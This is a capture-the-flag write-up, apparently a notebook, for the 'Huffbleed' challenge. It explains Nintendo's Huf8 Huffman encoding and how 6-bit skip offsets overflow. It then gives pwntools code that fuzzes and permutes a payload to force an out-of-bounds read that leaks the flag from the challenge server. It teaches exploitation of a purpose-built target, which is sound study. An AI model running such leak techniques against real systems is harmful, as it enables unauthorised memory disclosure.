# Solution for Huffbleed

_This challenge is based on Nintendo's Huffman compression used in a significant number of GBA/DS games. It's surprisingly hard to find a good link now, but [here's one such decoder](https://github.com/Plombo/vcromclaim/blob/master/huf8.py) (noting that the header is slightly different to the one implemented in this challenge). Encoding it turns out to be non-trivial, and almost everyone gets it wrong, so why not make a pwn challenge out of it?_

Let's begin with a brief exposition into how Huffman codes work.

Normally every character takes up exacly 8 bits no matter how frequently it appears. Huffman codes are the optimal way of assigning codes to these characters, so that more frequent characters require less bits to represent.

Here is an example taken from the [Wikipedia article](https://en.wikipedia.org/wiki/Huffman_coding) of a Huffman tree generated from the exact frequencies of the text `"this is an example of a huffman tree"`.

Huffman tree             |  Huffman codes
:-------------------------:|:-------------------------:
![tree](Huffman_tree_2.svg)  | ![codes](Huffman_tree_codes.png)

This 36-character string can now be represented using just 111 bits compared to 288 (=8\*36) bits. This does ignore the fact that we need to store the tree structure itself, and that is what we will talk about next.

So the Huffman tree itself is not difficult to construct (again, see the previous article), but there are many different ways you might choose to encode its structure. For the Nintendo Huf8 compression used in this challenge, the tree is stored in exactly _2n_ bytes where _n_ is the number of unique characters (i.e. up to 256). Roughly speaking, half of these are the actual character values, and the other half are pointers from a node to its children.

You might imagine that you could place the non-leaf nodes (i.e. the blue ones above) into a linear array, and then you could just point the left and right branches to the absolute index into the array. Since there at most 255 such nodes, we can encode each child in 8 bits. What Huf8 does is to encode the skip (or difference) between the current node to the child node, and hope that this fits in 6 bits. This is surprisingly non-trivial to do: BFS and DFS generally don't produce good enough labellings, but the greedy algorithm will work well in 99.9% of cases.

Here are some examples, noting that the [bandwidth](https://en.wikipedia.org/wiki/Graph_bandwidth) is defined as the largest skip of that particular labelling:
![bandwidth](huffbleedbw.png)

---

Now that we know a bit about Huffman codes, we can begin to discuss this challenge specifically. For a start, we want to find the 0.1% of cases that causes the bandwidth to exceed 64. The condition required to do this is quite subtle, so it is much easier to fuzz a payload that doesn't encode-decode back to itself. Taking random bytes from `/dev/random` or similar is not good enough, since the data is uniformly distributed and you basically get the balanced Huffman tree, which encodes very well under the greedy algorithm.

Instead, we will use random 4096-byte segments of random files. We want something that's structured enough for its Huffman tree to be quite variable (so there are very frequent characters and very infrequent characters), but at the same time we also want it to have 256 distinct characters to maximise the bandwidth. You can do this over all files in the filesystem, but executable binaries turn out to be quite good, and for this example we will work with `mscorlib.dll` (attached to the repo).

In [1]:
from pwn import *
from tqdm import trange
#import random

context.log_level = 'error'
mscorlib = open('mscorlib.dll', 'rb').read()

print(f'{len(mscorlib)=}')

for start in trange((len(mscorlib) & -1024) - 4096, 0, -1024):
    with process('./huffbleed') as sh:
        initial_payload = mscorlib[start:start+4096]
        sh.send(initial_payload)
        arr = sh.recvall().decode().split('\n')
        if arr[2] != arr[8]:
            print(f'Found a suitable payload at {start=}')
            break

len(mscorlib)=5439480


 10%|███████▉                                                                        | 526/5307 [00:20<03:05, 25.83it/s]

Found a suitable payload at start=4895744





Let's just quickly look at what the frequencies look like. More out of curiosity than for any actual analysis.

In [2]:
from collections import Counter
counter = Counter(initial_payload)
assert(len(counter)==256)
print(counter)

Counter({230: 264, 231: 264, 232: 264, 233: 264, 234: 264, 235: 264, 229: 254, 236: 218, 0: 51, 48: 19, 1: 18, 7: 18, 6: 18, 5: 18, 9: 8, 10: 8, 11: 8, 12: 8, 13: 8, 14: 8, 15: 8, 16: 8, 17: 8, 18: 8, 19: 8, 20: 8, 21: 8, 22: 8, 23: 8, 24: 8, 25: 8, 26: 8, 27: 8, 28: 8, 29: 8, 30: 8, 31: 8, 32: 8, 33: 8, 34: 8, 35: 8, 36: 8, 37: 8, 38: 8, 39: 8, 40: 8, 41: 8, 42: 8, 43: 8, 44: 8, 45: 8, 46: 8, 47: 8, 49: 8, 50: 8, 51: 8, 52: 8, 53: 8, 54: 8, 55: 8, 56: 8, 57: 8, 58: 8, 59: 8, 60: 8, 61: 8, 62: 8, 63: 8, 64: 8, 65: 8, 66: 8, 67: 8, 68: 8, 69: 8, 70: 8, 71: 8, 72: 8, 73: 8, 74: 8, 75: 8, 76: 8, 77: 8, 78: 8, 79: 8, 80: 8, 81: 8, 82: 8, 83: 8, 84: 8, 85: 8, 86: 8, 87: 8, 88: 8, 89: 8, 90: 8, 91: 8, 92: 8, 93: 8, 94: 8, 95: 8, 96: 8, 97: 8, 98: 8, 99: 8, 100: 8, 101: 8, 102: 8, 103: 8, 104: 8, 105: 8, 106: 8, 107: 8, 108: 8, 109: 8, 110: 8, 111: 8, 112: 8, 113: 8, 114: 8, 115: 8, 116: 8, 117: 8, 118: 8, 119: 8, 120: 8, 121: 8, 122: 8, 123: 8, 124: 8, 125: 8, 126: 8, 127: 8, 128: 8, 129: 8,

At this point we more or less need to reimplement the encoder in python. The reason is because we have two "encodings" for each character -- one from the actual Huffman tree, and one that actually gets decoded. This is because some of the `skip` offsets are greater than 64 so they overflow back to 0, so it skips to the wrong node. So let's just reimplement the encoder, and call the two encodings `byte2huff_part1` and `byte2huff_part2`.

In [3]:
dq = sorted(({'code':k,'freq':v} for k,v in counter.items()), key=lambda x:x['code'])
while (len(dq) > 1):
    dq.sort(key=lambda x:(x['freq']))
    right,left=dq.pop(0),dq.pop(0)
    new_item = {'left':left, 'right':right, 'freq':left['freq']+right['freq']}
    dq.append(new_item)
dq

# build codes (part 1)
huff2byte_part1 = {}
byte2huff_part1 = {}
def build(child=dq[0], acc=''):
    if 'code' in child:
        code = child['code']
        byte2huff_part1[code] = acc
        huff2byte_part1[acc] = code
    else:
        build(child['left'], acc+'0')
        build(child['right'], acc+'1')
build()

bitLength = sum(len(byte2huff_part1[k]) * v for k,v in counter.items())
byteLength = (bitLength + 7) // 8
byteLength

headerNodes = [dq[0]]
dq[0]['code'] = 0
while dq:
    bestIndex = 0
    for i in range(1, len(dq)):
        if (dq[i]['code'] - i < dq[bestIndex]['code'] - bestIndex):
            bestIndex = i
            
    bestNode = dq.pop(bestIndex)
    newCode = (len(headerNodes) // 2 - bestNode['code']) % 64
    if 'left' not in bestNode['left']:
        newCode += 0x40
    if 'left' not in bestNode['right']:
        newCode += 0x80
    bestNode['code'] = newCode
    for child in [bestNode['left'], bestNode['right']]:
        headerNodes.append(child)
        if 'left'in child:
            child['code'] = len(headerNodes) // 2
            dq.append(child)

# build codes (part 2)
huff2byte_part2 = {}
byte2huff_part2 = {}
def build2(i=0, acc='', isLeaf=False):
    code = headerNodes[i]['code']
    if isLeaf:
        huff2byte_part2[acc] = code
        byte2huff_part2.setdefault(code, []).append(acc)
    else:
        build2(2*((i+1)//2 + (code%64) + 1)-1, acc+'0', code&0x40)
        build2(2*((i+1)//2 + (code%64) + 1), acc+'1', code&0x80)
build2()

`byte2huff_part1` looks like this (all 256 characters have a unique mapping):

In [4]:
for x in byte2huff_part1.items():
    print(x)

(0, '0000000')
(48, '00000010')
(7, '00000011')
(6, '00000100')
(5, '00000101')
(1, '00000110')
(240, '000001110')
(239, '000001111')
(238, '000010000')
(237, '000010001')
(209, '000010010')
(208, '000010011')
(207, '000010100')
(206, '000010101')
(205, '000010110')
(204, '000010111')
(203, '000011000')
(202, '000011001')
(201, '000011010')
(200, '000011011')
(199, '000011100')
(198, '000011101')
(197, '000011110')
(196, '000011111')
(235, '0001')
(234, '0010')
(233, '0011')
(232, '0100')
(231, '0101')
(230, '0110')
(195, '011100000')
(194, '011100001')
(193, '011100010')
(192, '011100011')
(191, '011100100')
(190, '011100101')
(189, '011100110')
(188, '011100111')
(187, '011101000')
(186, '011101001')
(185, '011101010')
(184, '011101011')
(183, '011101100')
(182, '011101101')
(181, '011101110')
(180, '011101111')
(179, '011110000')
(178, '011110001')
(177, '011110010')
(176, '011110011')
(175, '011110100')
(174, '011110101')
(173, '011110110')
(172, '011110111')
(171, '011111000')
(17

And `byte2huff_part2` looks like this (some characters have multiple huffman codes leading to them, while others don't exist at all):

In [5]:
for x in byte2huff_part2.items():
    print(x)

(192, ['0000000', '00000101', '011100001', '011100011', '011100100', '011100101', '011111000', '011111100', '101010100', '101010101', '101100100', '101101100', '101101101', '111000100', '111001100', '111001101', '111010100', '111010101', '111011000', '111011001'])
(1, ['00000010', '00000100', '00000110'])
(0, ['000000110', '000000111', '000001110', '000001111', '110110100', '110110101', '111000001'])
(205, ['000010000', '000010010', '000010100', '000010110'])
(204, ['000010001', '000010011', '000010101', '000010111'])
(199, ['000011000', '000011100'])
(198, ['000011001', '000011101'])
(201, ['000011010'])
(200, ['000011011'])
(197, ['000011110'])
(196, ['000011111'])
(235, ['0001'])
(234, ['0010'])
(233, ['0011'])
(232, ['0100'])
(231, ['0101'])
(230, ['0110'])
(193, ['011100000', '011100010'])
(189, ['011100110'])
(188, ['011100111'])
(187, ['011101000'])
(186, ['011101001'])
(185, ['011101010'])
(184, ['011101011'])
(183, ['011101100'])
(182, ['011101101'])
(181, ['011101110'])
(180,

In particular, you actually can have more than 256 different huffman codes this way:

In [6]:
sum(map(len, byte2huff_part2.values()))

273

Anyway, with that out of the way, let's focus on the actual pwn challenge. The intended solve is there is nothing that causes a crash, and instead we need to leak the flag. This is helped by the fact that the flag is located just 62 bytes past the end of the `cmpBuffer` (and has length at most 32), so if we can leak 94 bytes past the end we are done. Here's what the `bss` section looks like:
![bss](huffbleed_bss.png)

The trick now is that any permutation of out `initial_payload` resolves in the same Huffman tree, thus the same set of bad encodings. However, permuting it _does_ change the actual bits that gets read, so the idea here is to permute our payload in such a way that upon reaching the end of `cmpBuffer`, we've actually decoded as few bytes as possible. Since we are forced to decode exactly 4096 bytes, this means that it will leak past the end and into the flag. What we will get back will be a "decoded" version of the flag, which we can re-encode (albeit non-uniquely) to obtain the flag. So here goes!

In [7]:
from random import seed, sample
seed(0) # just to make it reproducible

def get_single_part2(str):
    for i in range(len(str) + 1):
        if str[:i] in huff2byte_part2:
            return len(str[:i])
        
def get_many_part2(sample, init):
    count = 0
    orig = tuple(sample)
    str = init + ''.join(sample)
    while True:
        tmp = get_single_part2(str)
        if tmp is None:
            return count, len(str), orig
        str = str[tmp:]
        count += 1
        
#get_many_codes2('0101010101010101010101')
running_list = [byte2huff_part1[b] for b in initial_payload]
running_init = ''
running_count = 0
winner = []
#while True:
for _ in range(256):
    #print(len(running_list))
    best = min(get_many_part2(sample(running_list,16), running_init) for _ in range(64))
    #print(best)
    running_count += best[0]
    for item in best[2]:
        running_list.remove(item)
    winner += [huff2byte_part1[b] for b in best[2]]
    running_init = ''.join(best[2])[::-1][:best[1]][::-1]
    #print(f'total_so_far: {running_count} in {4096-len(running_list)}')
    
print(f'total_so_far: {running_count} in {4096-len(running_list)}')

final_payload = bytes(winner)
assert len(final_payload) == 4096
with open('huffbleed_final_payload.bin', 'wb') as fo:
    fo.write(final_payload)

total_so_far: 3668 in 4096


So, what this means here is that we have successfully rearranged the payload so that the entirety of `cmpBuffer` has been decoded into just 3668 bytes. Since we don't stop until we've decoded exactly 4096 bytes, this means that we will be leaking _past_ the `cmpBuffer` into other territory. Specifically, there's a bunch of `00`s and then the flag. In any case, let's pass our `final_payload` to the remote and see what we get back.

In [8]:
with remote('fun.chall.seetf.sg', 50006) as sh:
    sh.send(final_payload)
    output = sh.recvall()
output

b'Please feed me some data (up to 4096 bytes).\nSuccessfully read in 4096 bytes:\n 8b 14 ec e6 e6 0f e7 a2 e6 eb e9 e8 61 eb 52 ec a0 ec e7 eb df ce ec e7 e5 89 e6 e7 ec e6 db e6 ea ec e7 e7 bf 10 05 e8 e8 99 e8 82 ec e8 67 ea ea 39 95 eb e9 e7 e6 eb e5 e6 e6 4e e8 ea 87 e5 e8 44 ec a6 e9 ea 9a e9 e8 3c e7 02 8f ea ca 4b e6 72 ec 21 eb e7 07 e7 0f 71 eb ec b2 d0 e9 62 e9 1f 86 e7 ec e7 eb ea 17 a8 e5 eb e7 eb 33 82 ea 9a ec 4d e9 e5 56 ec 00 e5 e8 74 d9 e8 ea 8b 53 e6 eb ec ec e6 eb 78 68 ec 98 e5 e9 e7 ec ea ad e7 ea 39 e5 0a eb e6 aa ea e9 e7 e6 e6 e8 e6 ec 32 88 e7 96 e6 ec 63 e5 e5 e7 15 e7 ec 6e ea e5 f9 e5 e8 3e e5 d4 eb ec cb 98 bd e8 e6 e9 e5 e9 e5 8a e7 e6 e8 e9 7d 6b 03 eb e7 eb eb e6 4e a4 24 78 2f 31 e7 86 68 ea e7 e7 ad e6 eb f0 e7 e6 ec 7c e6 93 e8 e6 ea e9 e6 e8 a7 ec 51 a5 b8 e5 c7 06 97 e8 8e 38 ea 98 e1 88 13 e5 e8 eb e5 00 48 e9 e6 50 47 0a ea e7 e6 ea eb e6 e6 d5 e7 e8 25 32 e5 99 e9 4e e5 ea e5 e9 e9 e8 5b ea 95 e5 25 b1 ea e7 c5 58 07 ea ea e5 af ea 3e ec eb 9e eb

There's a bunch of `c0`s at the end which makes sense since `192` had `0000000` as an encoding. (Side note: many of the 192s come from the highest two bits being set to indicate leaves, and the lowest 6 bits indicating 0 skip. So they are tree pointers rather than "value 192"s.)

Anyway, that bit at the end there looks quite interesting, where there's some data hidden among the `c0`s. Let's narrow in on that.

In [9]:
dec = output.decode().split('\n')[-3]
dec_content = bytes.fromhex(dec)[running_count:].strip(b'\xc0')
dec_content

b'\xe6\xe7\xe7\xeb\xe7\xeb\xe6\xec\xe8\xec\x01\xe7\xb4W\xe5\xe6\xe7p+\x13\xe6n\xec\xe8\xea\xe5\xeb|\xe6\xb7\xe5\xec]\xe5\xebhj\xe8\xea\xe7\xec'

Alright, let's re-encode this! (Each byte has may have one or more huffman outcomes that might affect its alignment, so we product them all together.)

In [10]:
from functools import reduce
from itertools import product
from Crypto.Util.number import long_to_bytes

list_of_lists = [byte2huff_part2[b] for b in dec_content]
print(f'There are {reduce(lambda x,y:x*y,[len(x) for x in list_of_lists])} possibilities to search through.')
concats = [''.join(x) for x in product(*list_of_lists)]

candidates = []
for str in concats:
    bar = long_to_bytes(int(str[:0:-1], 2))[::-1]
    if all(b == 0 or 32 <= b < 127 for b in bar):
        candidates.append(bar)
print(f'Out of these, there are {len(candidates)} ASCII candidates:')
candidates

There are 768 possibilities to search through.
Out of these, there are 128 ASCII candidates:


[b'SEE{y u_bL3w_iY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_oY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_oY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0Us3_d0wN!}',
 b'SEE{y u_bL3

The exact candidate set you get will likely be different depending on your exact payload. You could also intersect with the candidate set from a different payload etc. In any case, there are really only four reasonable-looking flags from this list, which are of the form `SEE{y0u_[bf]L3w_mY_h0[uU]s3_d0wN!}`, so it's probably feasible to try all four.

The intended flag is `SEE{y0u_bL3w_mY_h0us3_d0wN!}`.